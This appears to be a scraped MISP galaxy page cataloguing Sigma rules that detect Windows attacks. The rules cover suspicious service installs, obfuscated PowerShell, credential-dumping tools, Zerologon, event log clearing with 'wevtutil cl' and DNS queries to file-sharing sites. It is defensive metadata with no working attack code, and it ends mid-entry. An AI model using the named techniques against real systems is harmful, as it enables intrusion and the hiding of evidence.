logsource.category No established category
logsource.product windows
tags ['attack.execution', 'attack.privilege_escalation', 'attack.lateral_movement', 'attack.t1021.002', 'attack.t1543.003', 'attack.t1569.002']
Related clusters

To see the related clusters, click here.

Suspicious Service Installation

Detects suspicious service installation commands

Internal MISP references

UUID 1d61f71d-59d2-479e-9562-4ff5f4ead16b which can be used as unique global reference for Suspicious Service Installation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author pH-T (Nextron Systems), Florian Roth (Nextron Systems)
creation_date 2022/03/18
falsepositive ['Unknown']
filename win_system_service_install_susp.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'car.2013-09-005', 'attack.t1543.003']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation COMPRESS OBFUSCATION - System

Detects Obfuscated Powershell via COMPRESS OBFUSCATION

Internal MISP references

UUID 175997c5-803c-4b08-8bb0-70b099f47595 which can be used as unique global reference for Invoke-Obfuscation COMPRESS OBFUSCATION - System in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, oscd.community
creation_date 2020/10/18
falsepositive ['Unknown']
filename win_system_invoke_obfuscation_via_compress_services.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

HackTool Service Registration or Execution

Detects installation or execution of services

Internal MISP references

UUID d26ce60c-2151-403c-9a42-49420d87b5e4 which can be used as unique global reference for HackTool Service Registration or Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/03/21
falsepositive ['Unknown']
filename win_system_service_install_hacktools.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.execution', 'attack.t1569.002', 'attack.s0029']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation STDIN+ Launcher - System

Detects Obfuscated use of stdin to execute PowerShell

Internal MISP references

UUID 72862bf2-0eb1-11eb-adc1-0242ac120002 which can be used as unique global reference for Invoke-Obfuscation STDIN+ Launcher - System in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jonathan Cheong, oscd.community
creation_date 2020/10/15
falsepositive ['Unknown']
filename win_system_invoke_obfuscation_stdin_services.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Moriya Rootkit - System

Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report

Internal MISP references

UUID 25b9c01c-350d-4b95-bed1-836d04a4f324 which can be used as unique global reference for Moriya Rootkit - System in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bhabesh Raj
creation_date 2021/05/06
falsepositive ['Unknown']
filename win_system_moriya_rootkit.yml
level critical
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1543.003']
Related clusters

To see the related clusters, click here.

ProcessHacker Privilege Elevation

Detects a ProcessHacker tool that elevated privileges to a very high level

Internal MISP references

UUID c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9 which can be used as unique global reference for ProcessHacker Privilege Elevation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/05/27
falsepositive ['Unlikely']
filename win_system_service_install_pua_proceshacker.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.execution', 'attack.privilege_escalation', 'attack.t1543.003', 'attack.t1569.002']
Related clusters

To see the related clusters, click here.

Mesh Agent Service Installation

Detects a Mesh Agent service installation. Mesh Agent is used to remotely manage computers

Internal MISP references

UUID e0d1ad53-c7eb-48ec-a87a-72393cc6cedc which can be used as unique global reference for Mesh Agent Service Installation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/11/28
falsepositive ['Legitimate use of the tool']
filename win_system_service_install_mesh_agent.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.command_and_control', 'attack.t1219']
Related clusters

To see the related clusters, click here.

Sliver C2 Default Service Installation

Detects known malicious service installation that appear in cases in which a Sliver implants execute the PsExec commands

Internal MISP references

UUID 31c51af6-e7aa-4da7-84d4-8f32cc580af2 which can be used as unique global reference for Sliver C2 Default Service Installation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/25
falsepositive ['Unknown']
filename win_system_service_install_sliver.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.execution', 'attack.privilege_escalation', 'attack.t1543.003', 'attack.t1569.002']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation Obfuscated IEX Invocation - System

Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references

Internal MISP references

UUID 51aa9387-1c53-4153-91cc-d73c59ae1ca9 which can be used as unique global reference for Invoke-Obfuscation Obfuscated IEX Invocation - System in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Daniel Bohannon (@Mandiant/@FireEye), oscd.community
creation_date 2019/11/08
falsepositive ['Unknown']
filename win_system_invoke_obfuscation_obfuscated_iex_services.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation VAR+ Launcher - System

Detects Obfuscated use of Environment Variables to execute PowerShell

Internal MISP references

UUID 8ca7004b-e620-4ecb-870e-86129b5b8e75 which can be used as unique global reference for Invoke-Obfuscation VAR+ Launcher - System in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jonathan Cheong, oscd.community
creation_date 2020/10/15
falsepositive ['Unknown']
filename win_system_invoke_obfuscation_var_services.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

New PDQDeploy Service - Server Side

Detects a PDQDeploy service installation which indicates that PDQDeploy was installed on the machines. PDQDeploy can be abused by attackers to remotely install packages or execute commands on target machines

Internal MISP references

UUID ee9ca27c-9bd7-4cee-9b01-6e906be7cae3 which can be used as unique global reference for New PDQDeploy Service - Server Side in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/22
falsepositive ['Legitimate use of the tool']
filename win_system_service_install_pdqdeploy.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1543.003']
Related clusters

To see the related clusters, click here.

Service Installation in Suspicious Folder

Detects service installation in suspicious folder appdata

Internal MISP references

UUID 5e993621-67d4-488a-b9ae-b420d08b96cb which can be used as unique global reference for Service Installation in Suspicious Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author pH-T (Nextron Systems)
creation_date 2022/03/18
falsepositive ['Unknown']
filename win_system_susp_service_installation_folder.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'car.2013-09-005', 'attack.t1543.003']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System

Detects Obfuscated Powershell via VAR++ LAUNCHER

Internal MISP references

UUID 14bcba49-a428-42d9-b943-e2ce0f0f7ae6 which can be used as unique global reference for Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, oscd.community
creation_date 2020/10/13
falsepositive ['Unknown']
filename win_system_invoke_obfuscation_via_var_services.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

RTCore Suspicious Service Installation

Detects the installation of RTCore service. Which could be an indication of Micro-Star MSI Afterburner vulnerable driver abuse

Internal MISP references

UUID 91c49341-e2ef-40c0-ac45-49ec5c3fe26c which can be used as unique global reference for RTCore Suspicious Service Installation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/30
falsepositive ['Unknown']
filename win_system_susp_rtcore64_service_install.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.persistence']

Service Installed By Unusual Client - System

Detects a service installed by a client which has PID 0 or whose parent has PID 0

Internal MISP references

UUID 71c276aa-49cd-43d2-b920-2dcd3e6962d5 which can be used as unique global reference for Service Installed By Unusual Client - System in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch (Nextron Systems), Elastic (idea)
creation_date 2022/09/15
falsepositive ['Unknown']
filename win_system_service_install_sups_unusal_client.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1543']
Related clusters

To see the related clusters, click here.

PsExec Service Installation

Detects PsExec service installation and execution events

Internal MISP references

UUID 42c575ea-e41e-41f1-b248-8093c3e82a28 which can be used as unique global reference for PsExec Service Installation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Thomas Patzke
creation_date 2017/06/12
falsepositive ['Unknown']
filename win_system_service_install_sysinternals_psexec.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.execution', 'attack.t1569.002', 'attack.s0029']
Related clusters

To see the related clusters, click here.

NetSupport Manager Service Install

Detects NetSupport Manager service installation on the target system.

Internal MISP references

UUID 2d510d8d-912b-45c5-b1df-36faa3d8c3f4 which can be used as unique global reference for NetSupport Manager Service Install in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/31
falsepositive ['Legitimate use of the tool']
filename win_system_service_install_netsupport_manager.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.persistence']

Windows Defender Threat Detection Disabled - Service

Detects the "Windows Defender Threat Protection" service has been disabled

Internal MISP references

UUID 6c0a7755-6d31-44fa-80e1-133e57752680 which can be used as unique global reference for Windows Defender Threat Detection Disabled - Service in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ján Trenčanský, frack113
creation_date 2020/07/28
falsepositive ['Administrator actions', 'Auto updates of Windows Defender causes restarts']
filename win_system_defender_disabled.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Important Windows Service Terminated With Error

Detects important or interesting Windows services that got terminated for whatever reason

Internal MISP references

UUID d6b5520d-3934-48b4-928c-2aa3f92d6963 which can be used as unique global reference for Important Windows Service Terminated With Error in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/04/14
falsepositive ['Rare false positives could occur since service termination could happen due to multiple reasons']
filename win_system_service_terminated_error_important.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion']

Suspicious Service Installation Script

Detects suspicious service installation scripts

Internal MISP references

UUID 70f00d10-60b2-4f34-b9a0-dc3df3fe762a which can be used as unique global reference for Suspicious Service Installation Script in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author pH-T (Nextron Systems)
creation_date 2022/03/18
falsepositive ['Unknown']
filename win_system_susp_service_installation_script.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'car.2013-09-005', 'attack.t1543.003']
Related clusters

To see the related clusters, click here.

TacticalRMM Service Installation

Detects a TacticalRMM service installation. Tactical RMM is a remote monitoring & management tool.

Internal MISP references

UUID 4bb79b62-ef12-4861-981d-2aab43fab642 which can be used as unique global reference for TacticalRMM Service Installation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/11/28
falsepositive ['Legitimate use of the tool']
filename win_system_service_install_tacticalrmm.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.command_and_control', 'attack.t1219']
Related clusters

To see the related clusters, click here.

Credential Dumping Tools Service Execution - System

Detects well-known credential dumping tools execution via service execution events

Internal MISP references

UUID 4976aa50-8f41-45c6-8b15-ab3fc10e79ed which can be used as unique global reference for Credential Dumping Tools Service Execution - System in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community
creation_date 2017/03/05
falsepositive ['Legitimate Administrator using credential dumping tool for password recovery']
filename win_system_mal_creddumper.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.execution', 'attack.t1003.001', 'attack.t1003.002', 'attack.t1003.004', 'attack.t1003.005', 'attack.t1003.006', 'attack.t1569.002', 'attack.s0005']
Related clusters

To see the related clusters, click here.

KrbRelayUp Service Installation

Detects service creation from KrbRelayUp tool used for privilege escalation in Windows domain environments where LDAP signing is not enforced (the default settings)

Internal MISP references

UUID e97d9903-53b2-41fc-8cb9-889ed4093e80 which can be used as unique global reference for KrbRelayUp Service Installation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sittikorn S, Tim Shelton
creation_date 2022/05/11
falsepositive ['Unknown']
filename win_system_krbrelayup_service_installation.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1543']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation Via Use MSHTA - System

Detects Obfuscated Powershell via use MSHTA in Scripts

Internal MISP references

UUID 7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4 which can be used as unique global reference for Invoke-Obfuscation Via Use MSHTA - System in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nikita Nazarov, oscd.community
creation_date 2020/10/09
falsepositive ['Unknown']
filename win_system_invoke_obfuscation_via_use_mshta_services.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Uncommon Service Installation Image Path

Detects uncommon service installation commands by looking at suspicious or uncommon image path values containing references to encoded powershell commands, temporary paths, etc.

Internal MISP references

UUID 26481afe-db26-4228-b264-25a29fe6efc7 which can be used as unique global reference for Uncommon Service Installation Image Path in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/03/18
falsepositive ['Unknown']
filename win_system_service_install_uncommon.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'car.2013-09-005', 'attack.t1543.003']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation Via Use Clip - System

Detects Obfuscated Powershell via use Clip.exe in Scripts

Internal MISP references

UUID 63e3365d-4824-42d8-8b82-e56810fefa0c which can be used as unique global reference for Invoke-Obfuscation Via Use Clip - System in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nikita Nazarov, oscd.community
creation_date 2020/10/09
falsepositive ['Unknown']
filename win_system_invoke_obfuscation_via_use_clip_services.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation CLIP+ Launcher - System

Detects Obfuscated use of Clip.exe to execute PowerShell

Internal MISP references

UUID f7385ee2-0e0c-11eb-adc1-0242ac120002 which can be used as unique global reference for Invoke-Obfuscation CLIP+ Launcher - System in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jonathan Cheong, oscd.community
creation_date 2020/10/13
falsepositive ['Unknown']
filename win_system_invoke_obfuscation_clip_services.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Tap Driver Installation

Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques

Internal MISP references

UUID 8e4cf0e5-aa5d-4dc3-beff-dc26917744a9 which can be used as unique global reference for Tap Driver Installation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Daniil Yugoslavskiy, Ian Davis, oscd.community
creation_date 2019/10/24
falsepositive ['Legitimate OpenVPN TAP installation']
filename win_system_service_install_tap_driver.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.exfiltration', 'attack.t1048']
Related clusters

To see the related clusters, click here.

Service Installation with Suspicious Folder Pattern

Detects service installation with suspicious folder patterns

Internal MISP references

UUID 1b2ae822-6fe1-43ba-aa7c-d1a3b3d1d5f2 which can be used as unique global reference for Service Installation with Suspicious Folder Pattern in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author pH-T (Nextron Systems)
creation_date 2022/03/18
falsepositive ['Unknown']
filename win_system_susp_service_installation_folder_pattern.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'car.2013-09-005', 'attack.t1543.003']
Related clusters

To see the related clusters, click here.

Remote Utilities Host Service Install

Detects Remote Utilities Host service installation on the target system.

Internal MISP references

UUID 85cce894-dd8b-4427-a958-5cc47a4dc9b9 which can be used as unique global reference for Remote Utilities Host Service Install in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/31
falsepositive ['Legitimate use of the tool']
filename win_system_service_install_remote_utilities.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.persistence']

Eventlog Cleared

One of the Windows Eventlogs has been cleared. e.g. caused by "wevtutil cl" command execution

Internal MISP references

UUID a62b37e0-45d3-48d9-a517-90c1a1b0186b which can be used as unique global reference for Eventlog Cleared in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/01/10
falsepositive ['Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)', 'System provisioning (system reset before the golden image creation)']
filename win_system_eventlog_cleared.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070.001', 'car.2016-04-002']
Related clusters

To see the related clusters, click here.

Important Windows Eventlog Cleared

Detects the clearing of one of the Windows Core Eventlogs. e.g. caused by "wevtutil cl" command execution

Internal MISP references

UUID 100ef69e-3327-481c-8e5c-6d80d9507556 which can be used as unique global reference for Important Windows Eventlog Cleared in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Tim Shelton, Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/05/17
falsepositive ['Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)', 'System provisioning (system reset before the golden image creation)']
filename win_system_susp_eventlog_cleared.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070.001', 'car.2016-04-002']
Related clusters

To see the related clusters, click here.

Zerologon Exploitation Using Well-known Tools

This rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) vulnerability using mimikatz zerologon module or other exploits from machine with "kali" hostname.

Internal MISP references

UUID 18f37338-b9bd-4117-a039-280c81f7a596 which can be used as unique global reference for Zerologon Exploitation Using Well-known Tools in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Demyan Sokolin @_drd0c, Teymur Kheirkhabarov @HeirhabarovT, oscd.community
creation_date 2020/10/13
falsepositive No established falsepositives
filename win_system_possible_zerologon_exploitation_using_wellknown_tools.yml
level critical
logsource.category No established category
logsource.product windows
tags ['attack.t1210', 'attack.lateral_movement']
Related clusters

To see the related clusters, click here.

Vulnerable Netlogon Secure Channel Connection Allowed

Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472.

Internal MISP references

UUID a0cb7110-edf0-47a4-9177-541a4083128a which can be used as unique global reference for Vulnerable Netlogon Secure Channel Connection Allowed in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author NVISO
creation_date 2020/09/15
falsepositive ['Unknown']
filename win_system_vul_cve_2020_1472.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1548']
Related clusters

To see the related clusters, click here.

Sysmon Application Crashed

Detects application popup reporting a failure of the Sysmon service

Internal MISP references

UUID 4d7f1827-1637-4def-8d8a-fd254f9454df which can be used as unique global reference for Sysmon Application Crashed in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Shelton
creation_date 2022/04/26
falsepositive ['Unknown']
filename win_system_application_sysmon_crash.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562']
Related clusters

To see the related clusters, click here.

KDC RC4-HMAC Downgrade CVE-2022-37966

Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation

Internal MISP references

UUID e6f81941-b1cd-4766-87db-9fc156f658ee which can be used as unique global reference for KDC RC4-HMAC Downgrade CVE-2022-37966 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/11/09
falsepositive ['Unknown']
filename win_system_kdcsvc_rc4_downgrade.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.privilege_escalation']

No Suitable Encryption Key Found For Generating Kerberos Ticket

Detects errors when a target server doesn't have suitable keys for generating kerberos tickets. This issue can occur for example when a service uses a user account or a computer account that is configured for only DES encryption on a computer that is running Windows 7 which has DES encryption for Kerberos authentication disabled.

Internal MISP references

UUID b1e0b3f5-b62e-41be-886a-daffde446ad4 which can be used as unique global reference for No Suitable Encryption Key Found For Generating Kerberos Ticket in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @SerkinValery
creation_date 2024/03/07
falsepositive ['Unknown']
filename win_system_kdcsvc_tgs_no_suitable_encryption_key_found.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1558.003']
Related clusters

To see the related clusters, click here.

Certificate Use With No Strong Mapping

Detects a user certificate that was valid but could not be mapped to a user in a strong way (such as via explicit mapping, key trust mapping, or a SID) This could be a sign of exploitation of the elevation of privilege vulnerabilities (CVE-2022-34691, CVE-2022-26931, CVE-2022-26923) that can occur when the KDC allows certificate spoofing by not requiring a strong mapping. Events where the AccountName and CN of the Subject do not match, or where the CN ends in a dollar sign indicating a machine, may indicate certificate spoofing.

Internal MISP references

UUID 993c2665-e6ef-40e3-a62a-e1a97686af79 which can be used as unique global reference for Certificate Use With No Strong Mapping in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @br4dy5
creation_date 2023/10/09
falsepositive ['If prevalent in the environment, filter on events where the AccountName and CN of the Subject do not reference the same user', 'If prevalent in the environment, filter on CNs that end in a dollar sign indicating it is a machine name']
filename win_system_kdcsvc_cert_use_no_strong_mapping.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.privilege_escalation']

Active Directory Certificate Services Denied Certificate Enrollment Request

Detects denied requests by Active Directory Certificate Services. Example of these requests denial include issues with permissions on the certificate template or invalid signatures.

Internal MISP references

UUID 994bfd6d-0a2e-481e-a861-934069fcf5f5 which can be used as unique global reference for Active Directory Certificate Services Denied Certificate Enrollment Request in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @SerkinValery
creation_date 2024/03/07
falsepositive ['Unknown']
filename win_system_adcs_enrollment_request_denied.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1553.004']
Related clusters

To see the related clusters, click here.

DHCP Server Loaded the CallOut DLL

This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded

Internal MISP references

UUID 13fc89a9-971e-4ca6-b9dc-aa53a445bf40 which can be used as unique global reference for DHCP Server Loaded the CallOut DLL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Dimitrios Slamaris
creation_date 2017/05/15
falsepositive ['Unknown']
filename win_system_susp_dhcp_config.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

DHCP Server Error Failed Loading the CallOut DLL

This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded

Internal MISP references

UUID 75edd3fd-7146-48e5-9848-3013d7f0282c which can be used as unique global reference for DHCP Server Error Failed Loading the CallOut DLL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Dimitrios Slamaris, @atc_project (fix)
creation_date 2017/05/15
falsepositive ['Unknown']
filename win_system_susp_dhcp_config_failed.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Suspicious Digital Signature Of AppX Package

Detects execution of AppX packages with known suspicious or malicious signature

Internal MISP references

UUID b5aa7d60-c17e-4538-97de-09029d6cd76b which can be used as unique global reference for Suspicious Digital Signature Of AppX Package in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/16
falsepositive ['Unknown']
filename win_appxpackaging_om_sups_appx_signature.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution']

HybridConnectionManager Service Running

Rule to detect the Hybrid Connection Manager service running on an endpoint.

Internal MISP references

UUID b55d23e5-6821-44ff-8a6e-67218891e49f which can be used as unique global reference for HybridConnectionManager Service Running in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2021/04/12
falsepositive ['Legitimate use of Hybrid Connection Manager via Azure function apps.']
filename win_hybridconnectionmgr_svc_running.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.t1554']
Related clusters

To see the related clusters, click here.

Unsigned Binary Loaded From Suspicious Location

Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations

Internal MISP references

UUID 8289bf8c-4aca-4f5a-9db3-dc3d7afe5c10 which can be used as unique global reference for Unsigned Binary Loaded From Suspicious Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/03
falsepositive ['Unknown']
filename win_security_mitigations_unsigned_dll_from_susp_location.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Microsoft Defender Blocked from Loading Unsigned DLL

Detects Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload arbitrary DLL

Internal MISP references

UUID 0b0ea3cc-99c8-4730-9c53-45deee2a4c86 which can be used as unique global reference for Microsoft Defender Blocked from Loading Unsigned DLL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bhabesh Raj
creation_date 2022/08/02
falsepositive ['Unknown']
filename win_security_mitigations_defender_load_unsigned_dll.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

WMI Persistence

Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.

Internal MISP references

UUID 0b7889b4-5577-4521-a60a-3376ee7f9f7b which can be used as unique global reference for WMI Persistence in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Gleb Sukhodolskiy, Timur Zinniatullin oscd.community
creation_date 2017/08/22
falsepositive ['Unknown (data set is too small; further testing needed)']
filename win_wmi_persistence.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1546.003']
Related clusters

To see the related clusters, click here.

DNS Query for Anonfiles.com Domain - DNS Client

Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes

Internal MISP references

UUID 29f171d7-aa47-42c7-9c7b-3c87938164d9 which can be used as unique global reference for DNS Query for Anonfiles.com Domain - DNS Client in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/16
falsepositive ['Rare legitimate access to anonfiles.com']
filename win_dns_client_anonymfiles_com.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.exfiltration', 'attack.t1567.002']
Related clusters

To see the related clusters, click here.

DNS Query To MEGA Hosting Website - DNS Client

Detects DNS queries for subdomains related to MEGA sharing website

Internal MISP references

UUID 66474410-b883-415f-9f8d-75345a0a66a6 which can be used as unique global reference for DNS Query To MEGA Hosting Website - DNS Client in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/16
falsepositive ['Legitimate DNS queries and usage of Mega']
filename win_dns_client_mega_nz.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.exfiltration', 'attack.t1567.002']
Related clusters

To see the related clusters, click here.

Query Tor Onion Address - DNS Client

Detects DNS resolution of an .onion address related to Tor routing networks

Internal MISP references

UUID 8384bd26-bde6-4da9-8e5d-4174a7a47ca2 which can be used as unique global reference for Query Tor Onion Address - DNS Client in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/02/20
falsepositive ['Unlikely']
filename win_dns_client_tor_onion.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.command_and_control', 'attack.t1090.003']
Related clusters

To see the related clusters, click here.

DNS Query To Ufile.io - DNS Client

Detects DNS queries to "ufile.io", which was seen abused by malware and threat actors as a method for data exfiltration

Internal MISP references

